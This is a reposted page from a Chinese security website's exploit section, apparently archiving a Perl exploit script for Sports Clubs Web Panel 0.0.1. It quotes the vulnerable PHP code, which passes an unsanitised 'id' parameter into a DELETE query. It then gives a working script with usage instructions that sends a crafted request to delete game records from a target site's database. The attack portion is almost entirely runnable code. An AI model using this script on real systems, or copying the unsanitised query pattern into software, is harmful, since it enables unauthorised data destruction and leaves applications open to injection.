• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit ,其中包含sports clubs,many sports clubs,clubs,clubs88,clubs88.net等知识点,遇到此问题的同学们可以参考下
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__

</div>

您可能想查找下面的文章:

  • Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

相关文章

  • Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
  • Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)
  • PHP 4.4.5 / 4.4.6 session_decode() Double Free Exploit PoC
  • eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
  • webEdition CMS (we_objectID) Blind SQL Injection Exploit
  • e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit
  • Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
  • phpDatingClub (website.php page) Local File Inclusion Vulnerability
  • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
  • FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • CoolPlayer m3u File Local Buffer Overflow Exploit
    • Maian Music 1.0 Insecure Cookie Handling Vulnerability
    • Mole Group Real Estate Script
    • CodeDB (list.php lang) Local File Inclusion Vulnerability
    • IceBB
    • pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability
    • Dana IRC 1.4a Remote Buffer Overflow Exploit
    • Belkin wireless G router ADSL2 modem Auth Bypass Exploit
    • phsBlog 0.2 Bypass SQL Injection Filtering Exploit
    • OllyDBG v1.10 and ImpREC v1.7f (export name) BOF PoC

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有